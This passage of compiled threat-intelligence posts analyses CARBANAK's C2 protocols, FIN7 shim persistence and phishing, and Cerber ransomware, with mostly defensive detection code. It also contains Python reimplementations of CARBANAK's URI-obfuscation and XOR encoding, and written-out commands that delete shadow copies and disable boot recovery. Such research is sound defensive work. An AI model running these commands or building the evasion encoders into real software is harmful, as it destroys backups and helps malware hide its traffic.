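def mangle_into_uri(encoded: str, rng: random.Random) -> str:
    # Insert '/' characters at random positions within the encoded payload,
    # then append a benign-looking file extension with no parameters.
    chars = list(encoded)
    for _ in range(rng.randint(2, 5)):
        chars.insert(rng.randint(0, len(chars)), "/")
    ext = rng.choice(["gif", "jpg", "png", "htm", "html", "php"])
    return "/" + "".join(chars) + "." + ext

def recover(uri: str) -> bytes:
    # The receiver reverses the transform: drop the extension and the
    # inserted slashes, then undo the character substitutions.
    body = uri.rsplit(".", 1)[0].replace("/", "")
    return base64.b64decode(body.replace(".", "/").replace("-", "+"))
```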

The pseudo-HTTP protocol uses any proxies discovered by the HTTP proxy monitoring thread or added by the adminka command. The backdoor also searches for proxy configurations to use in the registry at HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings and for each profile in the Mozilla Firefox configuration file at %AppData%\Mozilla\Firefox\<ProfileName>\prefs.js.
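Firefox’s prefs.js stores one preference per line in the form user_pref("name", value);. A defender can hunt for the same proxy settings the malware harvests with a few lines of Python, for example:

```python
import re

# One preference per line: user_pref("name", value);
PREF_RE = re.compile(r'user_pref\("([^"]+)",\s*(.+?)\);')

def extract_proxy_prefs(prefs_js: str) -> dict:
    """Collect network.proxy.* settings from the text of a prefs.js file."""
    found = {}
    for match in PREF_RE.finditer(prefs_js):
        name, value = match.groups()
        if name.startswith("network.proxy."):
            found[name] = value.strip('"')
    return found
```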

Custom Binary Protocol

Figure 6 describes the structure of the malware’s custom binary protocol. If a message is larger than 150 bytes, it is compressed with an unidentified algorithm. If a message is larger than 4096 bytes, it is broken into compressed chunks. This protocol has undergone several changes over the years, each version building upon the previous version in some way. These changes were likely introduced to render existing network signatures ineffective and to make signature creation more difficult.

Figure 6: Binary protocol message format
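The size thresholds described above can be sketched as follows, with zlib standing in for the protocol’s unidentified compression algorithm:

```python
import zlib

COMPRESS_THRESHOLD = 150   # messages larger than this are compressed
CHUNK_SIZE = 4096          # messages larger than this are chunked

def prepare_message(payload: bytes) -> list:
    """Apply the size rules described above: small messages pass through,
    medium messages are compressed, and large messages are split into
    separately compressed chunks."""
    if len(payload) <= COMPRESS_THRESHOLD:
        return [payload]
    if len(payload) <= CHUNK_SIZE:
        return [zlib.compress(payload)]
    return [zlib.compress(payload[i:i + CHUNK_SIZE])
            for i in range(0, len(payload), CHUNK_SIZE)]

def reassemble(chunks: list, original_len: int) -> bytes:
    # In the real protocol, header fields would signal whether the body is
    # compressed; here the original length serves that purpose.
    if original_len <= COMPRESS_THRESHOLD:
        return chunks[0]
    return b"".join(zlib.decompress(c) for c in chunks)
```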

Version 1

In the earliest version of the binary protocol, the message bodies stored in the <chunkData> field are simply XORed with the host ID. The initial message is not encrypted and contains the host ID.
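Repeating-key XOR of this sort is symmetric, so a single routine serves for both encryption and decryption. A minimal sketch:

```python
from itertools import cycle

def xor_crypt(data: bytes, key: bytes) -> bytes:
    # XOR each byte against the repeating key; running the function a
    # second time with the same key restores the original bytes.
    return bytes(b ^ k for b, k in zip(data, cycle(key)))
```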

Version 2

Rather than using the host ID as the key, this version uses a random XOR key between 32 and 64 bytes in length that is generated for each session. This key is sent in the initial message.

Version 3

Version 3 adds encryption to the headers. The first 19 bytes of the message headers (up to the <hdrXORKey2> field) are XORed with a five-byte key that is randomly generated per message and stored in the <hdrXORKey2> field. If the <flag> field of the message header is greater than one, the XOR key used to encrypt message bodies is iterated in reverse when encrypting and decrypting messages.

Version 4

This version adds a bit more complexity to the header encryption scheme. The headers are XOR encrypted with <hdrXORKey1> and <hdrXORKey2> combined and reversed.

Version 5

Version 5 is the most sophisticated of the binary protocols we have seen. A 256-bit AES session key is generated and used to encrypt both message headers and bodies separately. Initially, the key is sent to the C2 server with the entire message and headers encrypted with the RSA key exchange algorithm. All subsequent messages are encrypted with AES in CBC mode. The use of public key cryptography makes decryption of the session key infeasible without the C2 server’s private key.

The Roundup

We have rounded up 220 samples of the CARBANAK backdoor and compiled a table that highlights some interesting details that we were able to extract. It should be noted that in most of these cases the backdoor was embedded as a packed payload in another executable or in a weaponized document file of some kind. The MD5 hash is for the original executable file that eventually launches CARBANAK, but the details of each sample were extracted from memory during execution. This data provides us with a unique insight into the operational aspect of CARBANAK and can be downloaded here.

Protocol Evolution

As described earlier, CARBANAK’s binary protocol has undergone several significant changes over the years. Figure 7 illustrates a rough timeline of this evolution based on the compile times of samples we have in our collection. This may not be entirely accurate because our visibility is not complete, but it gives us a general idea as to when the changes occurred. It has been observed that some builds of this data-stealing backdoor use outdated versions of the protocol. This may suggest multiple groups of operators compiling their own builds of this data-stealing backdoor independently.

Figure 7: Timeline of binary protocol versions

*It is likely that we are missing an earlier build that utilized version 3.

Build Tool

Most of CARBANAK’s strings are encrypted in order to make analysis more difficult. We have observed that the key and the cipher texts for all the encrypted strings are changed for each sample that we have encountered, even amongst samples with the same compile time. The RC2 key used for the HTTP protocol has also been observed to change among samples with the same compile time. These observations paired with the use of campaign codes that must be configured denote the likely existence of a build tool.

Rapid Builds

Despite the likelihood of a build tool, we have found 57 unique compile times in our sample set, with some of the compile times being quite close in proximity. For example, on May 20, 2014, two builds were compiled approximately four hours apart and were configured to use the same C2 servers. Again, on July 30, 2015, two builds were compiled approximately 12 hours apart.

What changes in the code can we see in such short time intervals that would not be present in a build tool? In one case, one build was programmed to execute the runmem command for a file named wi.exe while the other was not. This command downloads an executable from the C2 server and runs it directly in memory. In another case, one build was programmed to check Internet Explorer’s trusted sites list for the domain of Blizko, an online money transfer service, while the other was not. We have also seen that different monitoring threads from Table 1 are enabled from build to build. These minor changes suggest that the code is quickly modified and compiled to adapt to the needs of the operator for particular targets.

Campaign Code and Compile Time Correlation

In some cases, there is a close proximity of the compile time of a CARBANAK sample to the month specified in a particular campaign code. Figure 8 shows some of the relationships that can be observed in our data set.

Figure 8: Campaign code to compile time relationships

Recent Updates

Recently, 64-bit variants of the backdoor have been discovered. We shared details about these variants in a recent blog post. Some of them are programmed to sleep until a configured activation date, when they will become active.


The “Carbanak Group”

Much of the publicly released reporting surrounding the CARBANAK malware refers to a corresponding “Carbanak Group”, who appears to be behind the malicious activity associated with this data-stealing backdoor. FireEye iSIGHT Intelligence has tracked several separate overarching campaigns employing the CARBANAK tool and other associated backdoors, such as DRIFTPIN (aka Toshliph). With the data available at this time, it is unclear how interconnected these campaigns are – if they are all directly orchestrated by the same criminal group, or if these campaigns were perpetrated by loosely affiliated actors sharing malware and techniques.


In all Mandiant investigations to date where the CARBANAK backdoor has been discovered, the activity has been attributed to the FIN7 threat group. FIN7 has been extremely active against the U.S. restaurant and hospitality industries since mid-2015.

FIN7 uses CARBANAK as a post-exploitation tool in later phases of an intrusion to cement their foothold in a network and maintain access, frequently using the video command to monitor users and learn about the victim network, as well as the tunnel command to proxy connections into isolated portions of the victim environment. FIN7 has consistently utilized legally purchased code signing certificates to sign their CARBANAK payloads. Finally, FIN7 has leveraged several new techniques that we have not observed in other CARBANAK related activity.

We have covered recent FIN7 activity in previous public blog posts.

The FireEye iSIGHT Intelligence MySIGHT Portal contains additional information on our investigations and observations into FIN7 activity.

Widespread Bank Targeting Throughout the U.S., Middle East and Asia

Proofpoint initially reported on a widespread campaign targeting banks and financial organizations throughout the U.S. and Middle East in early 2016. We identified several additional organizations in these regions, as well as in Southeast Asia and Southwest Asia being targeted by the same attackers.

This cluster of activity persisted from late 2014 into early 2016. Most notably, the infrastructure utilized in this campaign overlapped with LAZIOK, NETWIRE and other malware targeting similar financial entities in these regions.


DRIFTPIN (aka Spy.Agent.ORM and Toshliph) has been previously associated with CARBANAK in various campaigns. We have seen it deployed in initial spear phishing by FIN7 in the first half of 2016. Also, in late 2015, ESET reported on CARBANAK-associated attacks, detailing a spear phishing campaign targeting Russian and Eastern European banks using DRIFTPIN as the malicious payload. Cyphort Labs also revealed that variants of DRIFTPIN associated with this cluster of activity had been deployed via the RIG exploit kit placed on two compromised Ukrainian banks’ websites.

FireEye iSIGHT Intelligence observed this wave of spear phishing aimed at a large array of targets, including U.S. financial institutions and companies associated with Bitcoin trading and mining activities. This cluster of activity continues to be active to this day, targeting similar entities. Additional details on this latest activity are available on the FireEye iSIGHT Intelligence MySIGHT Portal.

Earlier CARBANAK Activity

In December 2014, Group-IB and Fox-IT released a report about an organized criminal group using malware called "Anunak" that has targeted Eastern European banks, U.S. and European point-of-sale systems and other entities. Kaspersky released a similar report about the same group under the name "Carbanak" in February 2015. The name “Carbanak” was coined by Kaspersky in this report – the malware authors refer to the backdoor as Anunak.

This activity was further linked to the 2014 exploitation of ATMs in Ukraine. Additionally, some of this early activity shares a similarity with current FIN7 operations – the use of Power Admin PAExec for lateral movement.


The details that can be extracted from CARBANAK provide us with a unique insight into the operational details behind this data-stealing malware. Several inferences can be made when looking at such data in bulk, as discussed above; they are summarized as follows:

  1. Based upon the information we have observed, we believe that at least some of the operators of CARBANAK either have access to the source code directly with knowledge on how to modify it or have a close relationship to the developer(s).
  2. Some of the operators may be compiling their own builds of the backdoor independently.
  3. A build tool is likely being used by these attackers that allows the operator to configure details such as C2 addresses, C2 encryption keys, and a campaign code. This build tool encrypts the binary’s strings with a fresh key for each build.
  4. Varying campaign codes indicate that independent or loosely affiliated criminal actors are employing CARBANAK in a wide-range of intrusions that target a variety of industries but are especially directed at financial institutions across the globe, as well as the restaurant and hospitality sectors within the U.S.

To SDB, Or Not To SDB: FIN7 Leveraging Shim Databases for Persistence

In 2017, Mandiant responded to multiple incidents we attribute to FIN7, a financially motivated threat group associated with malicious operations dating back to 2015. Throughout the various environments, FIN7 leveraged the CARBANAK backdoor, which this group has used in previous operations.

A unique aspect of the incidents was how the group installed the CARBANAK backdoor for persistent access. Mandiant identified that the group leveraged an application shim database to achieve persistence on systems in multiple environments. The shim injected a malicious in-memory patch into the Services Control Manager (“services.exe”) process, and then spawned a CARBANAK backdoor process.

Mandiant identified that FIN7 also used this technique to install a payment card harvesting utility for persistent access. This was a departure from FIN7’s previous approach of installing a malicious Windows service for process injection and persistent access.

Application Compatibility Shims Background

According to Microsoft, an application compatibility shim is a small library that transparently intercepts an API (via hooking), changes the parameters passed, handles the operation itself, or redirects the operation elsewhere, such as additional code stored on a system. Today, shims are mainly used for compatibility purposes for legacy applications. While shims serve a legitimate purpose, they can also be used in a malicious manner. Mandiant consultants previously discussed shim databases at both BruCon and BlackHat.

Shim Database Registration

There are multiple ways to register a shim database on a system. One technique is to use the built-in “sdbinst.exe” command line tool. Figure 1 displays the two registry keys created when a shim is registered with the “sdbinst.exe” utility.

Figure 1: Shim database registry keys

Once a shim database has been registered on a system, the shim database file (“.sdb” file extension) will be copied to the “C:\Windows\AppPatch\Custom” directory for 32-bit shims or “C:\Windows\AppPatch\Custom\Custom64” directory for 64-bit shims.

Malicious Shim Database Installation

To install and register the malicious shim database on a system, FIN7 used a custom Base64 encoded PowerShell script, which ran the “sdbinst.exe” utility to register a custom shim database file containing a patch onto a system. Figure 2 provides a decoded excerpt from a recovered FIN7 PowerShell script showing the parameters for this command.

Figure 2: Excerpt from a FIN7 PowerShell script to install a custom shim

FIN7 used various naming conventions for the shim database files that were installed and registered on systems with the “sdbinst.exe” utility. A common observance was the creation of a shim database file with a “.tmp” file extension (Figure 3).

Figure 3: Malicious shim database example

Upon registering the custom shim database on a system, a file named with a random GUID and an “.sdb” extension was written to the 64-bit shim database default directory, as shown in Figure 4. The registered shim database file had the same MD5 hash as the file that was initially created in the “C:\Windows\Temp” directory.

Figure 4: Shim database after registration

In addition, specific registry keys were created that correlated to the shim database registration.  Figure 5 shows the keys and values related to this shim installation.

Figure 5: Shim database registry keys

The database description used for the shim database registration, “Microsoft KB2832077”, was interesting because this KB number is not a published Microsoft Knowledge Base patch. This description (shown in Figure 6) appeared in the listing of installed programs within the Windows Control Panel on the compromised system.

Figure 6: Shim database as an installed application

Malicious Shim Database Details

During the investigations, Mandiant observed that FIN7 used a custom shim database to patch both the 32-bit and 64-bit versions of “services.exe” with their CARBANAK payload. This occurred when the “services.exe” process executed at startup. The shim database file contained shellcode for a first stage loader that obtained an additional shellcode payload stored in a registry key. The second stage shellcode launched the CARBANAK DLL (stored in a registry key), which spawned an instance of Service Host (“svchost.exe”) and injected itself into that process.  

Figure 7 shows a parsed shim database file that was leveraged by FIN7.

Figure 7: Parsed shim database file

For the first stage loader, the patch overwrote the “ScRegisterTCPEndpoint” function at relative virtual address (RVA) “0x0001407c” within the services.exe process with the malicious shellcode from the shim database file. 

The new “ScRegisterTCPEndpoint” function (shellcode) contained a reference to the path of “\REGISTRY\MACHINE\SOFTWARE\Microsoft\DRM”, which is a registry location where additional malicious shellcode and the CARBANAK DLL payload was stored on the system.

Figure 8 provides an excerpt of the parsed patch structure within the recovered shim database file.

Figure 8: Parsed patch structure from the shim database file

The shellcode stored within the registry path “HKLM\SOFTWARE\Microsoft\DRM” used the API function “RtlDecompressBuffer” to decompress the payload. It then slept for four minutes before calling the CARBANAK DLL payload's entry point on the system. Once loaded in memory, it created a new process named “svchost.exe” that contained the CARBANAK DLL. 

Bringing it Together

Figure 9 provides a high-level overview of a shim database being leveraged as a persistent mechanism for utilizing an in-memory patch, injecting shellcode into the 64-bit version of “services.exe”.

Figure 9: Shim database code injection process


Mandiant recommends the following to detect malicious application shimming in an environment:

  1. Monitor for new shim database files created in the default shim database directories of “C:\Windows\AppPatch\Custom” and “C:\Windows\AppPatch\Custom\Custom64”
  2. Monitor for registry key creation and/or modification events for the keys of “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom” and “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB”
  3. Monitor process execution events and command line arguments for malicious use of the “sdbinst.exe” utility 
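As a starting point for the first recommendation, here is a sketch in Python that inventories shim database files in the default directories (in practice you would baseline the results and alert on new arrivals):

```python
import os

# Default shim database directories from recommendation 1 above.
SHIM_DIRS = [
    r"C:\Windows\AppPatch\Custom",
    r"C:\Windows\AppPatch\Custom\Custom64",
]

def find_shim_databases(directories=SHIM_DIRS):
    """Return paths of .sdb files present in the given directories."""
    found = []
    for directory in directories:
        if not os.path.isdir(directory):
            continue  # e.g., running on a non-Windows analysis box
        for name in os.listdir(directory):
            if name.lower().endswith(".sdb"):
                found.append(os.path.join(directory, name))
    return found
```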

Introducing Monitor for macOS

UPDATE (April 4, 2018): Monitor now supports macOS 10.13.

As a malware analyst or systems programmer, having a suite of solid dynamic analysis tools is vital to being quick and effective. These tools enable us to understand malware capabilities and undocumented components of the operating system. One obvious tool that comes to mind is Procmon from the legendary Sysinternals Suite from Microsoft. Those tools only work on Windows though and we love macOS.

macOS has some fantastic dynamic instrumentation software included with the operating system and Xcode. In the past, we have used dynamic instrumentation tools such as Dtrace, a very powerful tracing subsystem built into the core of macOS. While it is very powerful and efficient, it commonly required us to write D scripts to get the interesting bits. We wanted something simpler.

Today, the Innovation and Custom Engineering (ICE) Applied Research team presents the public release of Monitor for macOS, a simple GUI application for monitoring common system events on a macOS host. Monitor captures the following event types:

  • Process execution with command line arguments
  • File creates (if data is written)
  • File renames
  • Network activity
  • DNS requests and replies
  • Dynamic library loads
  • TTY events

Monitor identifies system activities using a kernel extension (kext). Its focus is on capturing data that matters, with context. These events are presented in the UI with a rich search capability allowing users to hunt through event data for areas of interest.

The goal of Monitor is simplicity. When launching Monitor, the user is prompted for root credentials to launch a process and load our kext (don’t worry, the main UI process doesn’t run as root). From there, the user can click on the start button and watch the events roll in!

The UI is sparse with a few key features. There is the start/stop button, filter buttons, and a search bar. The search bar allows us to set simple filters on types of data we may want to filter or search for over all events. The event table is a listing of all the events Monitor is capable of presenting to the user. The filter buttons allow the user to turn off some classes of events. For example, if a TimeMachine backup were to kick off when the user was trying to analyze a piece of malware, the user can click the file system filter button and the file write events won’t clutter the display.

As an example, perhaps we are interested in seeing any processes that communicated with xkcd.com. We can simply use an “Any” filter and enter xkcd into the search bar, as seen in Figure 1.

Figure 1: User Interface

We think you will be surprised how useful Monitor can be when trying to figure out how components of macOS or even malware work under the hood, all without firing up a debugger or D script.

Click here to download Monitor. Please send us any feature requests or bug reports.

Apple, Mac and MacOS are registered trademarks or trademarks of Apple Inc.

M-Trends 2017: A View From the Front Lines

Every year Mandiant responds to a large number of cyber attacks, and 2016 was no exception. For our M-Trends 2017 report, we took a look at the incidents we investigated last year and provided a global and regional (the Americas, APAC and EMEA) analysis focused on attack trends, and defensive and emerging trends.

When it comes to attack trends, we’re seeing a much higher degree of sophistication than ever before. Nation-states continue to set a high bar for sophisticated cyber attacks, but some financial threat actors have caught up to the point where we no longer see the line separating the two. These groups have greatly upped their game and are thinking outside the box as well. One unexpected tactic we observed is attackers calling targets directly, showing us that they have become more brazen.

While there has been a marked acceleration of both the aggressiveness and sophistication of cyber attacks, defensive capabilities have been slower to evolve. We have observed that a majority of both victim organizations and those working diligently on defensive improvements are still lacking adequate fundamental security controls and capabilities to either prevent breaches or to minimize the damages and consequences of an inevitable compromise.

Fortunately, we’re seeing that organizations are becoming better at identifying breaches. The global median time from compromise to discovery has dropped significantly, from 146 days in 2015 to 99 days in 2016, but it’s still not good enough. As we noted in M-Trends 2016, Mandiant’s Red Team can obtain access to domain administrator credentials within roughly three days of gaining initial access to an environment, so 99 days is still 96 days too long.

We strongly recommend that organizations adopt a posture of continuous cyber security, risk evaluation and adaptive defense or they risk having significant gaps in both fundamental security controls and – more critically – visibility and detection of targeted attacks.

On top of our analysis of recent trends, M-Trends 2017 contains insights from our FireEye as a Service (FaaS) teams for the second consecutive year. FaaS monitors organizations 24/7, which gives them a unique perspective into the current threat landscape. Additionally, this year we partnered with law firm DLA Piper for a discussion of the upcoming changes in EMEA data protection laws.

You can learn more in our M-Trends 2017 report. Additionally, you can register for our live webinar on March 29, 2017, to hear more from our experts.

FIN7 Spear Phishing Campaign Targets Personnel Involved in SEC Filings

In late February 2017, FireEye as a Service (FaaS) identified a spear phishing campaign that appeared to be targeting personnel involved with United States Securities and Exchange Commission (SEC) filings at various organizations. Based on multiple identified overlaps in infrastructure and the use of similar tools, tactics, and procedures (TTPs), we have high confidence that this campaign is associated with the financially motivated threat group tracked by FireEye as FIN7.

FIN7 is a financially motivated intrusion set that selectively targets victims and uses spear phishing to distribute its malware. We have observed FIN7 attempt to compromise diverse organizations for malicious operations – usually involving the deployment of point-of-sale malware – primarily against the retail and hospitality industries.

Spear Phishing Campaign

All of the observed intended recipients of the spear phishing campaign appeared to be involved with SEC filings for their respective organizations. Many of the recipients were even listed in their company’s SEC filings. The sender email address was spoofed as EDGAR <> and the attachment was named “Important_Changes_to_Form10_K.doc” (MD5: d04b6410dddee19adec75f597c52e386). An example email is shown in Figure 1.

Figure 1: Example of a phishing email sent during this campaign

We have observed the following TTPs with this campaign:

  • The malicious documents drop a VBS script that installs a PowerShell backdoor, which uses DNS TXT records for its command and control. This backdoor appears to be a new malware family that FireEye iSIGHT Intelligence has dubbed POWERSOURCE. POWERSOURCE is a heavily obfuscated and modified version of the publicly available tool DNS_TXT_Pwnage. The backdoor uses DNS TXT requests for command and control and is installed in the registry or in Alternate Data Streams. Using DNS TXT records to communicate is not an entirely new finding, but it should be noted that this has been a rising trend since 2013, likely because it makes detecting and hunting for command and control traffic difficult.
  • We also observed POWERSOURCE being used to download a second-stage PowerShell backdoor called TEXTMATE in an effort to further infect the victim machine. The TEXTMATE backdoor provides a reverse shell to attackers and uses DNS TXT queries to tunnel interactive commands and other data. TEXTMATE is “memory resident” – often described as “fileless” malware. This is not a novel technique by any means, but it’s worth noting since it presents detection challenges and further speaks to the threat actor’s ability to remain stealthy and nimble in operations.
  • In some cases, we identified a Cobalt Strike Beacon payload being delivered via POWERSOURCE. This particular Cobalt Strike stager payload was previously used in operations linked to FIN7.
  • We observed that the same domain hosting the Cobalt Strike Beacon payload was also hosting a CARBANAK backdoor sample compiled in February 2017. CARBANAK malware has been used heavily by FIN7 in previous operations.
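
Defenders can hunt for DNS TXT-based C2 of this kind with simple heuristics over DNS logs. The sketch below is illustrative only; the thresholds and field names are our assumptions, not values derived from POWERSOURCE or TEXTMATE samples. It flags TXT lookups whose leftmost label looks like encoded data, or whose answers are unusually large for ordinary TXT records:

```python
import math
from collections import Counter

def shannon_entropy(s: str) -> float:
    """Bits per character of the string's empirical distribution."""
    counts = Counter(s)
    total = len(s)
    return -sum((c / total) * math.log2(c / total) for c in counts.values())

def suspicious_txt_lookup(qname: str, answer_len: int,
                          label_len: int = 30,
                          entropy_min: float = 3.5,
                          answer_max: int = 255) -> bool:
    """Heuristic: long, high-entropy leftmost labels suggest tunneled data;
    oversized TXT answers suggest inbound tasking. Thresholds are assumptions."""
    label = qname.split(".")[0]
    looks_encoded = len(label) > label_len and shannon_entropy(label) > entropy_min
    return looks_encoded or answer_len > answer_max
```

In practice such a rule would be tuned against a baseline of legitimate TXT traffic (SPF, DKIM, domain-verification records) to keep the false-positive rate manageable.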

Thus far, we have directly identified 11 targeted organizations in the following sectors:

  • Financial services, with different victims having insurance, investment, card services, and loan focuses
  • Transportation
  • Retail
  • Education
  • IT services
  • Electronics

All these organizations are based in the United States, and many have international presences. As the SEC is a U.S. regulatory organization, we would expect recipients of these spear phishing attempts to either work for U.S.-based organizations or be U.S.-based representatives of organizations located elsewhere. However, it is possible that the attackers could perform similar activity mimicking other regulatory organizations in other countries.


We have not yet identified FIN7’s ultimate goal in this campaign, as we either blocked the delivery of the malicious emails or our FaaS team detected and contained the attack early enough in the lifecycle that we observed no data targeting or theft. However, we surmise FIN7 can profit from compromised organizations in several ways. If the attackers are attempting to compromise persons involved in SEC filings because of their access to information, they may ultimately be pursuing securities fraud or other investment abuse. Alternatively, if they are tailoring their social engineering to these individuals but have other goals once they have established a foothold, they may intend to pursue one of many other fraud types.

Previous FIN7 operations deployed multiple point-of-sale malware families for the purpose of collecting and exfiltrating sensitive financial data. The use of the CARBANAK malware in FIN7 operations also provides limited evidence that these campaigns are linked to previously observed CARBANAK operations leading to fraudulent banking transactions, ATM compromise, and other monetization schemes.

Community Protection Event

FireEye implemented a Community Protection Event – FaaS, Mandiant, Intelligence, and Products – to secure all clients affected by this campaign. In this instance, an incident detected by FaaS led to the deployment of additional detections by the FireEye Labs team after FireEye Labs Advanced Reverse Engineering quickly analyzed the malware. Detections were then quickly deployed to the suite of FireEye products.

The FireEye iSIGHT Intelligence MySIGHT Portal contains additional information based on our investigations of a variety of topics discussed in this post, including FIN7 and the POWERSOURCE and TEXTMATE malware. Click here for more information.

M-Trends Asia Pacific: Organizations Must Improve at Detecting and Responding to Breaches

Since 2010, Mandiant, a FireEye company, has presented trends, statistics and case studies of some of the largest and most sophisticated cyber attacks. In February 2016, we released our annual global M-Trends® report based on data from the breaches we responded to in 2015. Now, we are releasing M-Trends Asia Pacific, our first report to focus on this very diverse and dynamic region.

Some of the key findings include:

  • Most breaches in the Asia Pacific region never became public. Most governments and industry-governing bodies are without effective breach disclosure laws, although this is slowly changing.
  • The median time of discovery of an attack was 520 days after the initial compromise. This is 374 days longer than the global median of 146 days.
  • Mandiant was engaged by many organizations that had already conducted forensic investigations (internally or using third parties) but had failed to eradicate the attackers from their environments. These efforts sometimes made matters worse by destroying or damaging the forensic evidence needed to understand the full extent of a breach or to attribute activity to a specific threat actor.
  • Some attacker tools were used almost exclusively to target organizations within APAC. In April 2015, we uncovered the malicious efforts of APT30, a suspected China-based threat group that has exploited the networks of governments and organizations across the region, targeting highly sensitive political, economic and military information.

Download M-Trends Asia Pacific to learn more.

Analyzing the Malware Analysts – Inside FireEye’s FLARE Team

At the Black Hat USA 2016 conference in Las Vegas last week, I was fortunate to sit down with Michael Sikorski, Director, FireEye Labs Advanced Reverse Engineering (FLARE) Team.

During our conversation we discussed the origin of the FLARE team, what it takes to analyze malware, Michael’s book “Practical Malware Analysis: The Hands-On Guide to Dissecting Malicious Software,” and the latest open source freeware tools FLOSS and FakeNet-NG.

Listen to the full podcast here.

Cerber: Analyzing a Ransomware Attack Methodology To Enable Protection

Ransomware is a common method of cyber extortion for financial gain that typically involves users being unable to interact with their files, applications or systems until a ransom is paid. Accessibility of cryptocurrency such as Bitcoin has directly contributed to this ransomware model. Based on data from FireEye Dynamic Threat Intelligence (DTI), ransomware activities have been rising fairly steadily since mid-2015.

On June 10, 2016, FireEye’s HX detected a Cerber ransomware campaign involving the distribution of emails with a malicious Microsoft Word document attached. If a recipient were to open the document, a malicious macro would contact an attacker-controlled website to download and install the Cerber family of ransomware.

Exploit Guard, a major new feature of FireEye Endpoint Security (HX), detected the threat and alerted HX customers on infections in the field so that organizations could inhibit the deployment of Cerber ransomware. After investigating further, the FireEye research team worked with security agency CERT-Netherlands, as well as web hosting providers who unknowingly hosted the Cerber installer, and were able to shut down that instance of the Cerber command and control (C2) within hours of detecting the activity. With the attacker-controlled servers offline, macros and other malicious payloads configured to download are incapable of infecting users with ransomware.

FireEye hasn’t seen any additional infections from this attacker since shutting down the C2 server, although the attacker could configure one or more additional C2 servers and resume the campaign at any time. This particular campaign was observed on six unique endpoints from three different FireEye endpoint security customers. HX has proven effective at detecting and inhibiting the success of Cerber malware.

Attack Process

The Cerber ransomware attack cycle we observed can be broadly broken down into eight steps:

  1. Target receives and opens a Word document.
  2. Macro in document is invoked to run PowerShell in hidden mode.
  3. Control is passed to PowerShell, which connects to a malicious site to download the ransomware.
  4. On successful connection, the ransomware is written to the disk of the victim.
  5. PowerShell executes the ransomware.
  6. The malware configures multiple concurrent persistence mechanisms by creating command processor, screensaver, and runonce registry entries.
  7. The executable uses native Windows utilities such as WMIC and/or VSSAdmin to delete backups and shadow copies.
  8. Files are encrypted and messages are presented to the user requesting payment.
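
The first three steps of this chain leave a distinctive parent-child process trail: an Office application spawning PowerShell with hidden or policy-bypassing flags. The sketch below is a minimal, hypothetical detection heuristic, not Exploit Guard’s internal logic; the flag list and process names are assumptions based on commonly abused PowerShell switches:

```python
# Illustrative heuristic: an Office app spawning PowerShell with
# hidden/bypass/encoded flags is rarely legitimate.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SUSPICIOUS_FLAGS = ("-w hidden", "-windowstyle hidden",
                    "-enc", "-encodedcommand", "-executionpolicy bypass")

def suspicious_spawn(parent: str, child: str, cmdline: str) -> bool:
    """Flag an Office-to-PowerShell spawn carrying suspicious flags."""
    cl = cmdline.lower()
    return (parent.lower() in OFFICE_APPS
            and child.lower() == "powershell.exe"
            and any(flag in cl for flag in SUSPICIOUS_FLAGS))
```

A rule like this catches the attack at step two, before any payload touches disk, which is the same point in the cycle where endpoint controls have the most leverage.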

Rather than waiting for the payload to be downloaded or started around stage four or five of the aforementioned attack cycle, Exploit Guard provides coverage for most steps of the attack cycle – beginning in this case at the second step.

The most common way to deliver ransomware is via Word documents with embedded macros or a Microsoft Office exploit. FireEye Exploit Guard detects both of these attacks at the initial stage of the attack cycle.

PowerShell Abuse

When the victim opens the attached Word document, the malicious macro writes a small piece of VBScript into memory and executes it. This VBScript executes PowerShell to connect to an attacker-controlled server and download the ransomware (profilest.exe), as seen in Figure 1.

Figure 1. Launch sequence of Cerber – the macro is responsible for invoking PowerShell and PowerShell downloads and runs the malware

It has been increasingly common for threat actors to use malicious macros to infect users because the majority of organizations permit macros to run from Internet-sourced office documents.

In this case we observed the macro code calling PowerShell to bypass execution policies – and run in hidden as well as encoded mode – with the intention that PowerShell would download the ransomware and execute it without the victim’s knowledge.

Further investigation of the link and executable showed that every few seconds the malware hash changed with a more current compilation timestamp and different appended data bytes – a technique often used to evade hash-based detection.

Cerber in Action

Initial payload behavior

Upon execution, the Cerber malware checks where it is being launched from. Unless it is being launched from a specific location (%APPDATA%\<GUID>), it creates a copy of itself in the victim's %APPDATA% folder under a filename chosen at random from the names in the %WINDIR%\system32 folder.

If the malware is not already running from that specific folder, then – after eliminating any blacklisted filenames from an internal list – it creates a renamed copy of itself in “%APPDATA%\<GUID>” using a pseudo-randomly selected name from the “system32” directory. It then executes the copy from the new location and cleans up after itself.

Shadow deletion

As with many other ransomware families, Cerber bypasses UAC checks, deletes any volume shadow copies, and disables safe boot options. Cerber accomplishes this by launching the following processes with the respective arguments:

Vssadmin.exe "delete shadows /all /quiet"

WMIC.exe "shadowcopy delete"

Bcdedit.exe "/set {default} recoveryenabled no"

Bcdedit.exe "/set {default} bootstatuspolicy ignoreallfailures"
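
Because these commands vary little between ransomware families, they make robust command-line detections. Below is a hedged sketch of such a rule; the patterns are drawn from the invocations above, and the matching logic is illustrative rather than any vendor’s actual signature:

```python
# (executable suffix, substring that must appear in its arguments)
BACKUP_TAMPERING = (
    ("vssadmin.exe", "delete shadows"),
    ("wmic.exe", "shadowcopy delete"),
    ("bcdedit.exe", "recoveryenabled no"),
    ("bcdedit.exe", "ignoreallfailures"),
)

def is_backup_tampering(image: str, args: str) -> bool:
    """Flag process launches that delete shadow copies or cripple recovery."""
    image, args = image.lower(), args.lower()
    return any(image.endswith(exe) and needle in args
               for exe, needle in BACKUP_TAMPERING)
```

Alerting on these launches gives defenders a chance to interrupt the attack before encryption begins, since shadow deletion precedes the encryption stage in the cycle above.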


People may wonder why victims pay the ransom to the threat actors. In some cases it is as simple as needing to get files back, but in other instances a victim may feel coerced or even intimidated. We noticed these tactics being used in this campaign, where the victim is shown the message in Figure 2 upon being infected with Cerber.

Figure 2. A message to the victim after encryption

The ransomware authors attempt to incentivize the victim into paying quickly by providing a 50 percent discount if the ransom is paid within a certain timeframe, as seen in Figure 3.



Figure 3. Ransom offered to victim, which is discounted for five days

Multilingual Support

As seen in Figure 4, the Cerber ransomware presented its message and instructions in 12 different languages, indicating this attack was on a global scale.

Figure 4. Interface provided to the victim to pay ransom supports 12 languages


